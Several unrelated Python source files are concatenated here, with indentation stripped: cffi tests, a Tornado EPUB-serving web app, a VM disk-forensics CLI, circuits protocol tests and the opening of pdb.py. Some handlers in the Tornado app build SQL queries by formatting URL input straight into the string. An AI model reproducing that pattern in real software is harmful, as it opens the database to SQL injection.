@pytest.mark.skipif("sys.platform != 'win32'")
def test_getwinerror(self):
ffi = FFI()
code, message = ffi.getwinerror(1155)
assert code == 1155
assert message == ("No application is associated with the "
"specified file for this operation")
ffi.cdef("void SetLastError(int);")
lib = ffi.dlopen("Kernel32.dll")
lib.SetLastError(2)
code, message = ffi.getwinerror()
assert code == 2
assert message == "The system cannot find the file specified"
code, message = ffi.getwinerror(-1)
assert code == 2
assert message == "The system cannot find the file specified"
def test_from_buffer(self):
import array
ffi = FFI()
a = array.array('H', [10000, 20000, 30000])
c = ffi.from_buffer(a)
assert ffi.typeof(c) is ffi.typeof("char[]")
ffi.cast("unsigned short *", c)[1] += 500
assert list(a) == [10000, 20500, 30000]
def test_all_primitives(self):
ffi = FFI()
for name in [
"char",
"short",
"int",
"long",
"long long",
"signed char",
"unsigned char",
"unsigned short",
"unsigned int",
"unsigned long",
"unsigned long long",
"float",
"double",
"long double",
"wchar_t",
"_Bool",
"int8_t",
"uint8_t",
"int16_t",
"uint16_t",
"int32_t",
"uint32_t",
"int64_t",
"uint64_t",
"int_least8_t",
"uint_least8_t",
"int_least16_t",
"uint_least16_t",
"int_least32_t",
"uint_least32_t",
"int_least64_t",
"uint_least64_t",
"int_fast8_t",
"uint_fast8_t",
"int_fast16_t",
"uint_fast16_t",
"int_fast32_t",
"uint_fast32_t",
"int_fast64_t",
"uint_fast64_t",
"intptr_t",
"uintptr_t",
"intmax_t",
"uintmax_t",
"ptrdiff_t",
"size_t",
"ssize_t",
]:
x = ffi.sizeof(name)
assert 1 <= x <= 16
|
|
import json
import xml.etree.ElementTree as ET
import re
import os
import datetime
import mimetypes
from StringIO import StringIO
from urlparse import parse_qs as parse_querystring
import tornado.web
from tornado import gen
import authorization
from epub import EPUB
from epub.utils import listFiles
from data.utils import opendb, DatabaseConnection
from data import opds
def accepted_formats(header):
"""
Returns a list of accepted formats in HTTP request header
:type header: tornado.web.RequestHandler.request.headers
:param header: HTTP Request Header
"""
try:
header_list = header.split(",")
for i, v in enumerate(header_list):
header_list[i] = v.split(";")[0].strip()
return header_list
except AttributeError: # No Accept: header?
return []
def user_real_ip(request):
"""
Tornado is meant to be deployed behind a proxy. The official documentation says
remote_ip is to check if a X-Real-Ip exists, but apparently that's not the case.
:type request: tornado.web.RequestHandler.request
:param request: HTTP Request
"""
if "X-Real-IP" in request.headers:
return request.headers.get("X-Real-IP")
else:
return request.remote_ip
class GeneralErrorHandler(tornado.web.RequestHandler):
def __init__(self, application, request, status_code):
tornado.web.RequestHandler.__init__(self, application, request)
self.set_status(status_code)
def write_error(self, status, **kwargs):
self.write("Bad request")
def prepare(self):
raise tornado.web.HTTPError(400)
class MainHandler(tornado.web.RequestHandler):
def get(self, *args, **kwargs):
self.render("hello.html",
title="Welcome!",
user=user_real_ip(self.request),
host=self.request.headers.get("Host"))
class GetInfo(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self, filename):
if filename:
response = yield gen.Task(self.querydb, filename)
if "text/html" in accepted_formats(self.request.headers.get("accept")):
self.render("info.html",
title=response["metadata"]["title"],
id=response["id"],
meta=response["metadata"],
contents=response["toc"],
manifest=response["manifest"],
cover=response["cover"]
)
else:
self.set_header("Content-Type", "application/json")
output = response
output["cover"] = "/book/{0}/manifest/{1}".format(response["id"], response["cover"])
self.write(json.dumps(output, indent=4))
self.finish()
else:
raise tornado.web.HTTPError(404)
def querydb(self, isbn, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ? ", (isbn,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
epubfile = EPUB(path)
output = epubfile.info
output["cover"] = epubfile.cover
output["id"] = epubfile.id
output["toc"] = epubfile.contents
return callback(output)
class ShowManifest(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self, filename):
if filename:
response = yield gen.Task(self.querydb, filename)
self.set_header("Content-Type", "application/json")
self.set_header("Charset", "UTF-8")
self.write(json.dumps(response, indent=4))
self.finish()
else:
raise tornado.web.HTTPError(400)
def querydb(self, isbn, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ? ", (isbn,)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
epubfile = EPUB(path)
output = epubfile.info["manifest"]
return callback(output)
class ListFiles(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self):
response = yield gen.Task(self.cataloguedump)
if "text/html" in accepted_formats(self.request.headers.get("accept")):
self.render("catalogue.html",
output=response, search=False)
else:
self.set_header("Content-Type", "application/json")
self.set_header("Charset", "UTF-8")
self.write(json.dumps(response, indent=4))
self.finish()
def cataloguedump(self, callback):
response = listFiles()
return callback(response)
class ShowFileToc(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self, identifier):
if identifier:
try:
output = yield gen.Task(self.queryToc, identifier)
self.set_header("Content-Type", "application/json")
self.write(json.dumps(output, indent=4))
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def queryToc(self, identifier, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ?", (identifier, )).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
output = EPUB(path).contents
return callback(output)
class GetFilePart(tornado.web.RequestHandler):
"""Get TOC item"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier, part, section=False):
if identifier and part and not section:
try:
output = yield gen.Task(self.perform, identifier, part, section=False)
except IOError:
raise tornado.web.HTTPError(404)
elif identifier and part and section:
try:
output = yield gen.Task(self.perform, identifier, part, section)
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(405)
self.set_header("Content-Type", "text/html")
self.set_header("Charset", "UTF-8")
self.write(output)
self.finish()
def perform(self, identifier, part, section, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = ?", (identifier, )).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
try:
epub = EPUB(path)
part_path = ""
for i in epub.contents:
if part == i.get("id"):
part_path = i.get("src")
output = epub.read(re.sub(r"#(.*)", "", part_path)) # strip fragment id.
output = re.sub(r'(href|src)="(\.\./)?(.*?)"', '\g<1>="/getpath/{0}/\g<3>"'.format(identifier), output)
output = re.sub(r"(href|src)='(\.\./)?(.*?)'", '\g<1>="/getpath/{0}/\g<3>"'.format(identifier), output)
if section:
try:
from htmlentitydefs import entitydefs
parser = ET.XMLParser()
parser.parser.UseForeignDTD(True)
parser.entity.update(entitydefs)
source = StringIO(output)
root = ET.parse(source, parser)
section = int(section) - 1
name = root.find(".//{http://www.w3.org/1999/xhtml}body")[section]
output = " ".join([t for t in list(name.itertext())])
except Exception, e:
print e
raise tornado.web.HTTPError(404)
except KeyError:
raise tornado.web.HTTPError(404)
return callback(output)
class GetFilePath(tornado.web.RequestHandler):
"""Resolution fallback"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier, part):
if identifier and part:
try:
output, mimetype = yield gen.Task(self.perform, identifier, part)
self.set_header("Content-Type", mimetype)
self.write(output)
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def perform(self, identifier, part, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = '{0}'".format(identifier)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
filepath = ""
try:
epub = EPUB(path)
for i in epub.namelist():
if i.endswith(part):
filepath = i
output = epub.read(filepath)
mimetype = "" # play safe
for i in epub.info["manifest"]:
if i["href"].endswith(part):
mimetype = i["mimetype"]
except KeyError:
output = "Nope."
mimetype = ""
pass
response = (output, mimetype)
return callback(response)
class GetCover(tornado.web.RequestHandler):
"""Special handle to allow unauthorized fetching of cover"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier):
if identifier:
try:
output, mimetype = yield gen.Task(self.perform, identifier)
self.set_header("Content-Type", mimetype)
self.write(output)
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def perform(self, identifier, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = '{0}'".format(identifier)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
try:
epub = EPUB(path)
filepath, mimetype = "", ""
for i in epub.info["manifest"]:
if i["id"] == epub.cover:
filepath = i["href"]
mimetype = i["mimetype"]
output = epub.read(os.path.join(epub.root_folder, filepath)), mimetype
except KeyError:
output = "KEY ERROR"
pass
return callback(output)
class GetResource(tornado.web.RequestHandler):
"""Fetch from manifest"""
@tornado.web.asynchronous
@gen.engine
def get(self, identifier, manifest_id):
if identifier and manifest_id:
try:
output, mimetype = yield gen.Task(self.perform, identifier, manifest_id)
self.set_header("Content-Type", mimetype)
self.write(output)
self.finish()
except IOError:
raise tornado.web.HTTPError(404)
else:
raise tornado.web.HTTPError(400)
def perform(self, identifier, toc_id, callback):
database, conn = opendb()
try:
path = database.execute("SELECT path FROM books WHERE isbn = '{0}'".format(identifier)).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
filepath = ""
mimetype = ""
try:
epub = EPUB(path)
for i in epub.info["manifest"]:
if i["id"] == toc_id:
filepath = i["href"]
mimetype = i["mimetype"]
if not mimetype:
mimetype = "text/plain"
output = epub.read(os.path.join(epub.root_folder, filepath)), mimetype
except KeyError:
output = "KEY ERROR"
pass
return callback(output)
class DownloadPublication(tornado.web.RequestHandler):
def get(self, filename):
if filename:
database, conn = opendb()
try:
path = database.execute(
"SELECT path FROM books WHERE isbn = '{0}' ".format(filename)
).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
output = open(path, "r")
self.set_header('Content-Type', 'application/zip')
self.set_header('Content-Disposition', 'attachment; filename='+os.path.basename(path)+'')
self.write(output.read())
else:
raise tornado.web.HTTPError(404)
class DownloadWithExLibris(tornado.web.RequestHandler):
def get(self, filename):
if filename:
database, conn = opendb()
try:
path = database.execute(
"SELECT path FROM books WHERE isbn = '{0}' ".format(filename)
).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
output = EPUB(path, "a")
exlibris = open(os.path.join(self.get_template_path(), "exlibris.xhtml"), "r").read().format(
host=self.request.headers.get("Host"),
user=user_real_ip(self.request),
date=datetime.date.today())
part = StringIO(exlibris)
output.addpart(part, "exlibris.xhtml", "application/xhtml+xml", 2)
output.close()
output.filename.seek(0)
self.set_header('Content-Type', 'application/zip')
self.set_header('Content-Disposition', 'attachment; filename='+os.path.basename(path)+'')
self.write(output.filename.read())
else:
raise tornado.web.HTTPError(404)
class DownloadPreview(tornado.web.RequestHandler):
def get(self, filename):
if filename:
database, conn = opendb()
try:
path = database.execute(
"SELECT path FROM books WHERE isbn = '{0}' ".format(filename)
).fetchone()["path"]
except TypeError:
raise tornado.web.HTTPError(404)
finally:
conn.close()
# begin
epub = EPUB(path)
num = None
for n, i in enumerate(epub.info["guide"]):
if i["type"] == "text":
num = n
break
if num:
items = [x["href"] for x in epub.info["guide"][:(num+1)]]
else:
# if no type="text" is found, provide 20% of content
num = int((len(epub.info["spine"]) / 100.00) * 20.00)
items = [x["href"] for x in epub.info["guide"][:num]]
fakefile = StringIO()
output = EPUB(fakefile, "w")
output.author, output.title, output.language = epub.author, epub.title, epub.language
src = []
for i in items:
from htmlentitydefs import entitydefs
parser = ET.XMLParser()
parser.parser.UseForeignDTD(True)
parser.entity.update(entitydefs)
filelike = StringIO(epub.read(os.path.join(epub.root_folder, i)))
root = ET.parse(filelike, parser)
map(src.append, [os.path.normpath(os.path.join(os.path.dirname(os.path.join(epub.root_folder, i)),
x.attrib["src"]))
for x in root.findall(".//*[@src]")] +
[os.path.normpath(os.path.join(os.path.dirname(os.path.join(epub.root_folder, i)),
x.attrib["href"]))
for x in root.findall(".//{http://www.w3.org/1999/xhtml}link[@href]")])
src = list(set(src)) # remove multiple references
# add non-part manifest items
for i in src:
output.additem(epub.read(i), i.replace(epub.root_folder+"/", ""), mimetypes.guess_type(i)[0])
# add selected parts
for i in items:
output.addpart(epub.read(os.path.join(epub.root_folder, i)), i, "application/xhtml+xml")
# generate exlibris
exlibris = open(os.path.join(self.get_template_path(), "exlibris.xhtml"), "r").read().format(
host=self.request.headers.get("Host"),
user=user_real_ip(self.request),
date=datetime.date.today())
# add exlibris
part = StringIO(exlibris)
output.addpart(part, "exlibris.xhtml", "application/xhtml+xml", len(output.opf[2])-1)
output.close()
# select file
output.filename.seek(0)
self.set_header('Content-Type', 'application/zip')
# if isolate script, use epub.writetodisk("preview_"+os.path.basename(path))
self.set_header('Content-Disposition', 'attachment; filename=''preview_'+os.path.basename(path)+'')
self.write(output.filename.read())
else:
raise tornado.web.HTTPError(404)
class OPDSCatalogue(tornado.web.RequestHandler):
@tornado.web.asynchronous
@gen.engine
def get(self):
if os.path.exists(os.path.join(os.path.dirname(__file__), os.path.pardir, "feed.xml")):
self.set_header("Content-Type", "application/atom+xml")
with open("feed.xml", "r") as f:
self.write(f.read())
self.finish()
else:
catalogue = yield gen.Task(self.perform, )
self.set_header("Content-Type", "application/atom+xml")
self.write(catalogue)
self.finish()
def perform(self, callback):
catalogue = opds.generateCatalogRoot()
with open(os.path.join(os.path.dirname(__file__), os.path.pardir, "feed.xml"), "w") as f:
f.write(catalogue)
return callback(catalogue)
class MainQuery(tornado.web.RequestHandler):
def get(self):
query = parse_querystring(self.request.query)
if not query:
self.redirect("/catalogue")
connessione = DatabaseConnection()
result = connessione.query(query.keys()[0], query.values()[0][0])
meta = []
for entry in result:
meta.append({"id": entry["isbn"], "title": entry["title"], "filename": os.path.basename(entry["path"]), "author": entry["author"]})
connessione.exit()
if "text/html" in accepted_formats(self.request.headers.get("accept")):
self.render("catalogue.html", output=meta, search=query.values()[0][0])
else:
self.set_header("Content-Type", "application/json")
self.write(json.dumps(meta))
|
|
# Copyright (c) 2016-2017, Matteo Cafasso
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import json
import shutil
import hashlib
import logging
import argparse
from pathlib import Path
from collections import OrderedDict
from tempfile import NamedTemporaryFile
from vminspect.vtscan import VTScanner
from vminspect.usnjrnl import usn_journal
from vminspect.winevtx import WinEventLog
from vminspect.vulnscan import VulnScanner
from vminspect.comparator import DiskComparator
from vminspect.timeline import FSTimeline, NTFSTimeline
from vminspect.winreg import RegistryHive, registry_root
from vminspect.filesystem import FileSystem, hash_filesystem, posix_path
def main():
results = {}
arguments = parse_arguments()
logging.basicConfig(level=arguments.debug and logging.DEBUG or logging.INFO)
logging.getLogger('requests').setLevel(logging.WARNING)
results = COMMANDS[arguments.name](arguments)
if results is not None:
print(json.dumps(results, indent=2))
def list_files_command(arguments):
return list_files(arguments.disk, identify=arguments.identify,
size=arguments.size)
def list_files(disk, identify=False, size=False):
logger = logging.getLogger('filesystem')
with FileSystem(disk) as filesystem:
logger.debug("Listing files.")
files = hash_filesystem(filesystem)
if identify:
logger.debug("Gatering file types.")
for file_meta in files:
file_meta['type'] = filesystem.file(file_meta['path'])
if size:
logger.debug("Gatering file sizes.")
for file_meta in files:
file_meta['size'] = filesystem.stat(file_meta['path'])['size']
return files
def compare_command(arguments):
return compare_disks(arguments.disk1, arguments.disk2,
identify=arguments.identify, size=arguments.size,
extract=arguments.extract, path=arguments.path,
registry=arguments.registry,
concurrent=arguments.concurrent)
def compare_disks(disk1, disk2, identify=False, size=False, registry=False,
extract=False, path='.', concurrent=False):
with DiskComparator(disk1, disk2) as comparator:
results = comparator.compare(concurrent=concurrent,
identify=identify,
size=size)
if extract:
extract = results['created_files'] + results['modified_files']
files = comparator.extract(1, extract, path=path)
results.update(files)
if registry:
registry = comparator.compare_registry(concurrent=concurrent)
results['registry'] = registry
return results
def registry_command(arguments):
return parse_registry(
arguments.hive, disk=arguments.disk, sort=arguments.sort)
def parse_registry(hive, disk=None, sort=False):
if disk is not None:
with FileSystem(disk) as filesystem:
registry = extract_registry(filesystem, hive)
else:
registry = RegistryHive(hive)
registry.rootkey = registry_root(hive)
if sort:
keys = sorted((k for k in registry.keys()), key=lambda k: k.timestamp)
return OrderedDict((k.path, (k.timestamp, k.values)) for k in keys)
else:
return {k.path: (k.timestamp, k.values) for k in registry.keys()}
def extract_registry(filesystem, path):
with NamedTemporaryFile(buffering=0) as tempfile:
filesystem.download(path, tempfile.name)
return RegistryHive(tempfile.name)
def vtscan_command(arguments):
with VTScanner(arguments.disk, arguments.apikey) as vtscanner:
vtscanner.batchsize = arguments.batchsize
filetypes = arguments.types and arguments.types.split(',') or None
return [r._asdict() for r in vtscanner.scan(filetypes=filetypes)]
def vulnscan_command(arguments):
with VulnScanner(arguments.disk, arguments.url) as vulnscanner:
return [r._asdict() for r in vulnscanner.scan(arguments.concurrency)]
def usnjrnl_command(arguments):
return parse_usnjrnl(arguments.usnjrnl, disk=arguments.disk)
def parse_usnjrnl(usnjrnl, disk=None):
if disk is not None:
with FileSystem(disk) as filesystem:
return extract_usnjrnl(filesystem, usnjrnl)
else:
return [e._asdict() for e in usn_journal(usnjrnl)]
def extract_usnjrnl(filesystem, path):
with NamedTemporaryFile(buffering=0) as tempfile:
root = filesystem.inspect_get_roots()[0]
inode = filesystem.stat(path)['ino']
filesystem.download_inode(root, inode, tempfile.name)
return [e._asdict() for e in usn_journal(tempfile.name)]
def timeline_command(arguments):
logger = logging.getLogger('timeline')
with FSTimeline(arguments.disk) as timeline:
events = [e._asdict() for e in timeline.timeline()]
if arguments.identify:
logger.debug("Gatering file types.")
events = identify_files(timeline, events)
if arguments.hash:
logger.debug("Gatering file hashes.")
events = calculate_hashes(timeline, events)
return events
def usnjrnl_timeline_command(arguments):
logger = logging.getLogger('usnjrnl_timeline')
with NTFSTimeline(arguments.disk) as timeline:
events = [e._asdict() for e in timeline.usnjrnl_timeline()]
if arguments.identify:
logger.debug("Gatering file types.")
events = identify_files(timeline, events)
if arguments.hash:
logger.debug("Gatering file hashes.")
events = calculate_hashes(timeline, events)
if arguments.extract:
logger.debug("Extracting created files.")
extract_created_files(timeline, arguments.extract, events)
if arguments.recover:
logger.debug("Recovering deleted files.")
extract_deleted_files(timeline, arguments.recover, events)
return events
def identify_files(timeline, events):
for event in (e for e in events if e['allocated']):
try:
event['type'] = timeline.file(event['path'])
except RuntimeError:
pass
return events
def calculate_hashes(timeline, events):
for event in (e for e in events if e['allocated']):
try:
event['hash'] = timeline.checksum(event['path'])
except RuntimeError:
pass
return events
def extract_created_files(timeline, path, events):
path = Path(path)
if not path.exists():
path.mkdir(parents=True)
for event in (e for e in events
if 'FILE_CREATE' in e['changes'] and e['allocated']):
try:
if 'hash' in event:
sha_hash = event['hash']
else:
sha_hash = timeline.checksum(event['path'])
source = event['path']
name = Path(posix_path(event['path'])).name
destination = Path(path, '_'.join((sha_hash, name)))
if not destination.exists():
timeline.download(source, str(destination))
except RuntimeError:
pass
def extract_deleted_files(timeline, path, events):
path = Path(path)
root = timeline.inspect_get_roots()[0]
if not path.exists():
path.mkdir(parents=True)
for event in (e for e in events if 'FILE_DELETE' in e['changes']):
inode = event['file_reference_number']
try:
with NamedTemporaryFile(buffering=0) as tempfile:
timeline.download_inode(root, inode, tempfile.name)
name = Path(posix_path(event['path'])).name
sha_hash = hashlib.sha1(tempfile.read()).hexdigest()
destination = Path(path, '_'.join((sha_hash, name)))
shutil.copy(tempfile.name, str(destination))
event['hash'] = sha_hash
event['recovered'] = True
except RuntimeError:
event['recovered'] = False
def eventlog_command(arguments):
with WinEventLog(arguments.disk) as eventlog:
print('\n'.join(eventlog.eventlog(arguments.path)))
def parse_arguments():
parser = argparse.ArgumentParser(description='Inspects VM disk images.')
parser.add_argument('-d', '--debug', action='store_true', default=False,
help='log in debug mode')
subparsers = parser.add_subparsers(dest='name', title='subcommands',
description='valid subcommands')
list_parser = subparsers.add_parser('list',
help='Lists the content of a disk.')
list_parser.add_argument('disk', type=str, help='path to disk image')
list_parser.add_argument('-i', '--identify', action='store_true',
default=False, help='report file types')
list_parser.add_argument('-s', '--size', action='store_true',
default=False, help='report file sizes')
compare_parser = subparsers.add_parser('compare',
help='Compares two disks.')
compare_parser.add_argument('disk1', type=str,
help='path to first disk image')
compare_parser.add_argument('disk2', type=str,
help='path to second disk image')
compare_parser.add_argument('-c', '--concurrent', action='store_true',
default=False, help='use concurrency')
compare_parser.add_argument('-e', '--extract', action='store_true',
default=False, help='extract new files')
compare_parser.add_argument('-p', '--path', type=str, default='.',
help='path where to extract files')
compare_parser.add_argument('-i', '--identify', action='store_true',
default=False, help='report file types')
compare_parser.add_argument('-s', '--size', action='store_true',
default=False, help='report file sizes')
compare_parser.add_argument('-r', '--registry', action='store_true',
default=False, help='compare registry')
registry_parser = subparsers.add_parser(
'registry', help='Lists the content of a registry file.')
registry_parser.add_argument('hive', type=str, help='path to hive file')
registry_parser.add_argument('-s', '--sort', action='store_true',
default=False,
help='sort the keys by timestamp')
registry_parser.add_argument('-d', '--disk', type=str, default=None,
help='path to disk image')
vtscan_parser = subparsers.add_parser(
'vtscan', help='Scans a disk and queries VirusTotal.')
vtscan_parser.add_argument('apikey', type=str, help='VirusTotal API key')
vtscan_parser.add_argument('disk', type=str, help='path to disk image')
vtscan_parser.add_argument('-b', '--batchsize', type=int, default=1,
help='VT requests batch size')
vtscan_parser.add_argument(
'-t', '--types', type=str, default='',
help='comma separated list of file types (REGEX) to be scanned')
vulnscan_parser = subparsers.add_parser(
'vulnscan', help='Scans a disk and queries VBE.')
vulnscan_parser.add_argument('url', type=str,
help='URL to vulnerabilities DB')
vulnscan_parser.add_argument('disk', type=str, help='path to disk image')
vulnscan_parser.add_argument('-c', '--concurrency', type=int, default=1,
help='amount of concurrent queries against DB')
usnjrnl_parser = subparsers.add_parser(
'usnjrnl', help='Parses the Update Sequence Number Journal file.')
usnjrnl_parser.add_argument('-u', '--usnjrnl', type=str,
default='C:\\$Extend\\$UsnJrnl',
help='path to USN file')
usnjrnl_parser.add_argument('-d', '--disk', type=str, default=None,
help='path to disk image')
timeline_parser = subparsers.add_parser('timeline',
help="""Parses the disk content
to build a timeline of events.""")
timeline_parser.add_argument('disk', type=str, help='path to disk image')
timeline_parser.add_argument('-i', '--identify', default=False,
action='store_true', help='report file types')
timeline_parser.add_argument('-s', '--hash', action='store_true',
default=False, help='report file hash (SHA1)')
usnjrnl_timeline_parser = subparsers.add_parser(
'usnjrnl_timeline', help="""Parses the NTFS Update Sequence Number
Journal to build a timeline of events.""")
usnjrnl_timeline_parser.add_argument('disk', type=str,
help='path to disk image')
usnjrnl_timeline_parser.add_argument('-i', '--identify', default=False,
action='store_true',
help='report file types')
usnjrnl_timeline_parser.add_argument('-s', '--hash', action='store_true',
default=False,
help='report file hash (SHA1)')
usnjrnl_timeline_parser.add_argument('-e', '--extract', type=str,
default='',
help='Extract created files into path')
usnjrnl_timeline_parser.add_argument('-r', '--recover', type=str,
default='',
help='Try recovering deleted files')
eventlog_parser = subparsers.add_parser(
'eventlog', help="""Parses the given Windows Event Log.""")
eventlog_parser.add_argument('disk', type=str, help='path to disk image')
eventlog_parser.add_argument('path', type=str, help='path to event log')
return parser.parse_args()
COMMANDS = {'list': list_files_command,
'compare': compare_command,
'registry': registry_command,
'vtscan': vtscan_command,
'vulnscan': vulnscan_command,
'usnjrnl': usnjrnl_command,
'timeline': timeline_command,
'usnjrnl_timeline': usnjrnl_timeline_command,
'eventlog': eventlog_command}
if __name__ == '__main__':
main()
|
|
#!/usr/bin/env python
from pytest import fixture, skip, PLATFORM
from circuits.core import Value
from circuits.node.utils import dump_event, dump_value
if PLATFORM == 'win32':
skip('Broken on Windows')
from circuits import Component, Event
from circuits.node.protocol import Protocol
class return_value(Event):
success = True
class firewall_block(Event):
pass
class AppClient(Component):
write_data = b''
def return_value(self):
return 'Hello server!'
def write(self, data):
self.write_data = data
class AppFirewall(Component):
write_data = b''
def fw_receive(self, event, sock):
return self.__event_is_allow(event)
def fw_send(self, event, sock):
return self.__event_is_allow(event)
def write(self, data):
self.write_data = data
def __event_is_allow(self, event):
allow = 'return_value' == event.name \
and 'prohibits_channel' not in event.channels
if not allow:
self.fire(firewall_block())
return allow
class AppServer(Component):
write_data = b''
write_sock = None
def return_value(self):
return 'Hello client!'
def write(self, sock, data):
self.write_sock = sock
self.write_data = data
@fixture()
def app_client(request, manager, watcher):
app = AppClient()
app.register(manager)
watcher.wait('registered')
app.protocol = Protocol().register(app)
watcher.wait('registered')
def finalizer():
app.unregister()
request.addfinalizer(finalizer)
return app
@fixture()
def app_firewall(request, manager, watcher):
app = AppFirewall()
app.register(manager)
watcher.wait('registered')
app.protocol = Protocol(
sock='sock obj',
receive_event_firewall=app.fw_receive,
send_event_firewall=app.fw_send,
).register(app)
watcher.wait('registered')
def finalizer():
app.unregister()
request.addfinalizer(finalizer)
return app
@fixture()
def app_server(request, manager, watcher):
app = AppServer()
app.register(manager)
watcher.wait('registered')
app.protocol = Protocol(sock='sock obj', server=True).register(app)
watcher.wait('registered')
def finalizer():
app.unregister()
request.addfinalizer(finalizer)
return app
def test_add_buffer(app_client, watcher):
packet = str.encode(dump_event(return_value(), 1))
app_client.protocol.add_buffer(packet)
assert watcher.wait('return_value_success')
assert watcher.wait('write')
value = Value()
value.value = 'Hello server!'
value.errors = False
value.node_call_id = 1
assert app_client.write_data == str.encode(dump_value(value) + '~~~')
def test_add_buffer_server(app_server, watcher):
packet = str.encode(dump_event(return_value(), 1))
app_server.protocol.add_buffer(packet)
assert watcher.wait('return_value_success')
assert watcher.wait('write')
value = Value()
value.value = 'Hello client!'
value.errors = False
value.node_call_id = 1
assert app_server.write_data == str.encode(dump_value(value) + '~~~')
assert app_server.write_sock == 'sock obj'
def test_firewall_receive(app_firewall, watcher):
# good event
packet = str.encode(dump_event(return_value(), 1))
app_firewall.protocol.add_buffer(packet)
assert watcher.wait('return_value')
# bad name
packet = str.encode(dump_event(Event.create('unallow_event'), 1))
app_firewall.protocol.add_buffer(packet)
assert watcher.wait('firewall_block')
# bad channel
event = return_value()
event.channels = ('prohibits_channel',)
packet = str.encode(dump_event(event, 1))
app_firewall.protocol.add_buffer(packet)
assert watcher.wait('firewall_block')
def test_firewall_send(app_firewall, watcher):
# good event
event = return_value()
generator = app_firewall.protocol.send(event)
next(generator) # exec
assert watcher.wait('write')
assert app_firewall.write_data == str.encode(dump_event(event, 0) + '~~~')
# bad name
generator = app_firewall.protocol.send(Event.create('unallow_event'))
next(generator) # exec
assert watcher.wait('firewall_block')
# bad channel
event = return_value()
event.channels = ('prohibits_channel',)
generator = app_firewall.protocol.send(event)
next(generator) # exec
assert watcher.wait('firewall_block')
def test_send(app_client, watcher):
event = return_value()
generator = app_client.protocol.send(event)
next(generator) # exec
assert watcher.wait('write')
assert app_client.write_data == str.encode(dump_event(event, 0) + '~~~')
value = Value()
value.value = 'Hello server!'
value.errors = False
value.node_call_id = 0
app_client.protocol.add_buffer(str.encode(dump_value(value) + '~~~'))
assert next(generator).getValue() == value.value
def test_send_server(app_server, watcher):
event = return_value()
generator = app_server.protocol.send(event)
next(generator) # exec
assert watcher.wait('write')
assert app_server.write_data == str.encode(dump_event(event, 0) + '~~~')
assert app_server.write_sock == 'sock obj'
value = Value()
value.value = 'Hello client!'
value.errors = False
value.node_call_id = 0
app_server.protocol.add_buffer(str.encode(dump_value(value) + '~~~'))
assert next(generator).getValue() == value.value
|
|
#! /usr/bin/env python
"""A Python debugger."""
# (See pdb.doc for documentation.)
import sys
import linecache
import cmd
import bdb
from reprlib import Repr
import os
import re
import pprint
import traceback
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
# Create a custom safe Repr instance and increase its maxstring.
# The default of 30 truncates error messages too easily.
_repr = Repr()
_repr.maxstring = 200
_saferepr = _repr.repr
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while 1:
line = fp.readline()
if line == '':
break
